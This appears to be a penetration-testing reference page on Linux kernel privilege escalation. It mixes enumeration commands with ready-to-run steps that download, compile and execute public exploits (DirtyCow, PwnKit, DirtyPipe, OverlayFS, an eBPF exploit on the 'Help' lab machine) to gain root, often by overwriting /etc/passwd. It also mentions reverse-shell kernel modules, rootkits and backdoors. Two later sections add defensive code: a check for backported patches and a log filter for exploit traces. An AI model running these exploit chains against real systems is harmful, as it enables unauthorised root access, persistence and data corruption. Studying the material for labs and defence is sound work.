
Kernel Exploits (Linux)

#Overview

Kernel exploits target vulnerabilities in the Linux kernel itself to escalate from user to root. They are the "nuclear option" of Linux privesc: powerful but risky. Kernel exploits can crash the system, corrupt data, or leave forensic artifacts. Always exhaust userland escalation (sudo, SUID, capabilities, cron) before resorting to kernel exploits.

#Prerequisites

  • User-level shell access
  • Kernel version identification (uname -a)
  • Compilation environment: gcc on target OR pre-compiled static binary from attacker
  • Matching architecture (x86, x64, ARM)

#Detection & Enumeration

```bash
# Get kernel version and architecture
uname -a
# Linux intentions 5.15.0-58-generic #64-Ubuntu SMP ... x86_64 x86_64 x86_64 GNU/Linux

# Get detailed version
cat /proc/version
# Linux version 5.15.0-58-generic (buildd@lcy02-amd64-101) ...

# Distribution info (for exploit compatibility)
cat /etc/os-release
cat /etc/lsb-release
lsb_release -a

# Compiler availability
which gcc
gcc --version
```

#Automated Exploit Suggestion

```bash
# Linux Exploit Suggester (LES)
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

# linux-exploit-suggester-2 (more comprehensive)
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl -k $(uname -r)
```

#Exploitation / Execution

#Compilation Strategy

```bash
# Option 1: Compile on target (requires gcc)
gcc exploit.c -o exploit
./exploit

# Option 2: Static compile on attacker machine (recommended)
# On attacker machine with matching architecture:
gcc -static -o exploit exploit.c
# Transfer and run on target
chmod +x exploit
./exploit

# Option 3: Pre-compiled exploits from repositories
# Download statically compiled binary matching the kernel version
```

#Common Linux Kernel Exploits

DirtyCow (CVE-2016-5195) -- Kernel 2.6.22 through 4.8.3:

```bash
# Race condition in COW (Copy-on-Write) mechanism
# Allows writing to read-only memory mappings
# Affects many older kernels, very reliable
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w /etc/passwd /tmp/passwd
# Overwrite /etc/passwd with a modified version containing a root user
```

PwnKit (CVE-2021-4034) -- polkit's pkexec:

```bash
# Affects all major Linux distributions with pkexec
# Not a kernel bug: exploits the SUID pkexec binary (polkit), so it is independent of kernel version
# Download PoC:
wget https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c
gcc cve-2021-4034-poc.c -o pwnkit
./pwnkit
# Spawns root shell
```

GameOver(lay) (CVE-2023-2640, CVE-2023-32629) -- OverlayFS:

```bash
# Ubuntu-specific kernel vulnerability in OverlayFS
# Affects Ubuntu kernels 5.19 and 6.2
unshare -Urm sh -c '...'  # exploit chain
```

OverlayFS (CVE-2015-1328) -- Older Ubuntu kernels:

```bash
# Classic overlayfs exploit
gcc ofs.c -o ofs
./ofs
```

CVE-2022-0847 (DirtyPipe) -- Kernel 5.8+:

```bash
# Allows overwriting read-only files
# Overwrite /etc/passwd with root entry
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o dirtypipez
./dirtypipez
```

#Real Example: Help (Easy)

```bash
uname -a
# Linux help 4.4.0-116-generic #140-Ubuntu SMP ...

# Google: "linux kernel 4.4.0-116 exploit"
# Found CVE-2017-16995 (eBPF verifier)

# Download and compile
wget https://www.exploit-db.com/download/45010 -O exploit.c
gcc exploit.c -o exploit
./exploit
# Root shell spawned directly
```

#Custom Kernel Module Loading

When you have module loading capability:

```bash
# Create a simple reverse root shell kernel module
# Requires kernel headers matching the running kernel
# This is extremely noisy and detectable
```

#Common Pitfalls

  • Kernel panic (system crash) -- the exploit may crash the system. Test on a non-production system first.
  • Wrong architecture -- an x86 exploit on an x64 system will fail or crash. Check uname -m.
  • glibc version mismatch -- dynamically linked exploits compiled against a newer glibc fail on older systems. Static compilation avoids this.
  • gcc not installed -- the target may lack gcc. Compile statically on the attacker machine.
  • Exploit patched -- the kernel may have backported security patches without changing the version string.
  • Data corruption -- kernel exploits that modify kernel memory can corrupt filesystems or process state.
  • SELinux/AppArmor -- mandatory access controls may prevent exploit execution even when the kernel bug is present.
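
The "Exploit patched" pitfall above is the one a version string cannot answer: distribution kernels carry backported fixes, and the package changelog is the record of them. The following is an added example, not code from the original page; it assumes the Debian/Ubuntu changelog location (RPM-based systems expose the same data via `rpm -q --changelog kernel`) and uses a constructed changelog entry for the test.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): check whether a distribution kernel's
# package changelog lists a CVE, i.e. whether the fix was backported even though
# uname -r still reports an "affected" upstream version.
# Assumed default path is the Debian/Ubuntu layout for the running kernel.
set -u

# Usage: cve_in_changelog CVE-ID [changelog-file]
# Prints "backported", "not-listed" or "unknown ..."; exit 0 only when the CVE is listed.
cve_in_changelog() {
  local cve="$1"
  local file="${2:-/usr/share/doc/linux-image-$(uname -r)/changelog.Debian.gz}"
  if [ ! -r "$file" ]; then
    echo "unknown (no readable changelog at $file)"
    return 2
  fi
  # Changelogs are usually gzip-compressed; fall back to plain cat otherwise.
  local reader="cat"
  case "$file" in *.gz) reader="gzip -dc" ;; esac
  if $reader "$file" | grep -q -i -- "$cve"; then
    echo "backported"
    return 0
  fi
  echo "not-listed"
  return 1
}

# Constructed sample in the style of an Ubuntu linux-image changelog (package
# version, maintainer and date are placeholders, not a real entry).
make_sample_changelog() {
  local f
  f="$(mktemp)"
  cat >"$f" <<'EOF'
linux (0.0.0-1.1) example; urgency=low

  * CVE-2016-5195
    - mm: remove gup_flags FOLL_WRITE games from __get_user_pages()

 -- Example Maintainer <maintainer@example.com>  Thu, 20 Oct 2016 10:00:00 +0200
EOF
  echo "$f"
}

sample="$(make_sample_changelog)"
cve_in_changelog CVE-2016-5195 "$sample"            # prints: backported
cve_in_changelog CVE-2022-0847 "$sample" || true    # prints: not-listed
rm -f "$sample"
```

A "not-listed" result is not proof of exposure: the upstream version may already contain the fix, or the distribution may have applied it under a different heading, so treat the changelog as one input alongside the suggester output.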

#OPSEC Considerations

  • Running kernel exploits is the noisiest privilege escalation method. Expect detection.
  • Kernel panics generate crash dumps, system logs, and often trigger pager alerts.
  • Compiling on the target leaves gcc invocation logs and object files.
  • Successful exploitation creates anomalous process trees and open file descriptors.
  • Many kernel exploits are signatured by AV/EDR products.
  • Static compilation off-target and memory-only execution reduce artifacts but do not eliminate detection.
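
The artifacts listed above are exactly what a defender should be matching on. The following is an added example, not code from the original page: a small filter that tags syslog/dmesg lines and auditd records (ausearch -i style) with the indicator category they carry. All sample log lines are constructed, not real captures, and the record layout is the assumed one.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): flag the host-side artifacts listed
# under OPSEC Considerations in syslog/dmesg and auditd (ausearch -i) output.
# Reads log lines on stdin and prints "<category>\t<line>" for each indicator.
set -u

flag_kernel_exploit_indicators() {
  local line
  while IFS= read -r line; do
    case "$line" in
      *"Kernel panic"*|*"BUG: unable to handle"*|*"general protection fault"*)
        printf 'KERNEL_CRASH\t%s\n' "$line" ;;
      *"loading out-of-tree module taints kernel"*|*"module verification failed"*)
        printf 'UNSIGNED_MODULE\t%s\n' "$line" ;;
      *"syscall=init_module"*|*"syscall=finit_module"*)
        printf 'MODULE_LOAD\t%s\n' "$line" ;;
      *"type=EXECVE"*'a0="gcc"'*|*"type=EXECVE"*'a0="cc"'*)
        printf 'ON_TARGET_COMPILE\t%s\n' "$line" ;;
    esac
  done
}

# Constructed sample (first line is benign; the other six each carry one indicator).
sample_log() {
  cat <<'EOF'
Jan 20 03:10:00 help CRON[1190]: (root) CMD (run-parts /etc/cron.hourly)
Jan 20 03:12:44 help kernel: [ 1234.567890] loading out-of-tree module taints kernel.
Jan 20 03:12:44 help kernel: [ 1234.567891] module verification failed: signature and/or required key missing - tainting kernel
type=EXECVE msg=audit(01/20/2023 03:13:02.101:2210) : argc=4 a0="gcc" a1="exploit.c" a2="-o" a3="exploit"
type=SYSCALL msg=audit(01/20/2023 03:13:40.400:2215) : arch=x86_64 syscall=finit_module success=yes exit=0 uid=user
Jan 20 03:14:02 help kernel: [ 1312.000001] BUG: unable to handle kernel NULL pointer dereference at 0000000000000000
Jan 20 03:14:02 help kernel: [ 1312.000010] Kernel panic - not syncing: Fatal exception
EOF
}

# Number of flagged lines in the constructed sample (6 of 7).
count_sample_indicators() {
  sample_log | flag_kernel_exploit_indicators | wc -l | tr -d ' '
}

sample_log | flag_kernel_exploit_indicators
```

On a live host the same filter runs over `journalctl -k` or `ausearch -i -m EXECVE,SYSCALL`; the EXECVE match depends on auditd having an execve rule in place, otherwise on-target compilation leaves only the object files.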

#Post-Exploitation Value

Successful kernel exploitation provides immediate root access with full control. It can be used to disable SELinux/AppArmor, load kernel rootkits, install persistent backdoors, extract all system credentials, and pivot with full network access. However, the risk of system instability makes it a last resort.

#Cross-References

#Tool References

| Tool | Link |
| --- | --- |
| linux-exploit-suggester | https://github.com/mzet-/linux-exploit-suggester |
| linux-exploit-suggester-2 | https://github.com/jondonas/linux-exploit-suggester-2 |
| Exploit-DB | https://www.exploit-db.com/ |

#Source Machines

  • Help (Easy, Linux) - Kernel 4.4.0-116-generic exploited via CVE-2017-16995 (eBPF verifier)